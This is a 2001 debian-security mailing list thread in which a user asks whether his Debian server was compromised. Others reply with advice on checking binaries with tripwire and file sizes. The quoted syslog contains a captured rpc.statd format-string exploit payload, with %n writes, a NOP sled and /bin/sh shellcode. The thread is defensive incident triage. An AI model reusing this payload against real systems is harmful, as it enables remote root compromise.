You can check for modified binaries with tripwire. If this was a decent hacker or even a script kiddie using a good tool, they probably would have purged your logs of all evidence.
So either: a) They are second rate or b) They didn't get in - k ----- Original Message ----- From: "Alvin Oga" <[EMAIL PROTECTED]> To: "Lukas Eppler" <[EMAIL PROTECTED]> Cc: <debian-security@lists.debian.org> Sent: Wednesday, July 11, 2001 5:45 PM Subject: Re: was I cracked? (rpc.statd, new version) hi ya lukas how did you check for modified binaries ??? if its an upto date deb box... its a failed attempt... if its a redhat box...time to go digging... you have to check the filesize of the binaries... not just the date... compared to one that you know is NOT compromized... and if you really paranoid...run some tests on it.. have fun alvin http://www.Linux-Sec.net -- turn if off stuff .. On Wed, 11 Jul 2001, Lukas Eppler wrote: > I have the following entries in /var/log/messages: > > Jul 9 01:21:03 blue -- MARK -- > Jul 9 01:21:11 blue > Jul 9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for > ^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7> <FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x% n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220 > Jul 9 01:21:11 blue > <C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\211<F3><B0>^K<CD>\200 <B0>^A<CD>\200<E8>\177<FF><FF><FF> > Jul 9 01:41:03 blue -- MARK -- > > I run debian 2.2, nfs-common is Version: 1:0.1.9.1-1 which has the long known > exploit fixed. I can't find modified binaries or any strange behaviour... was > this a defeated attack? The second line says /bin/sh somewhere which makes me > a bit concerned... Was I cracked? > > Lukas > > > > -- > Tempobrain AG - Dufourstrasse 179 - 8008 Zürich > http://www.tempobrain.com | icq # 5856 2285 > +44 20 7233 6206 | +44 79 8037 7312 > +41 1 389 29 29 | +41 76 373 07 87 > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
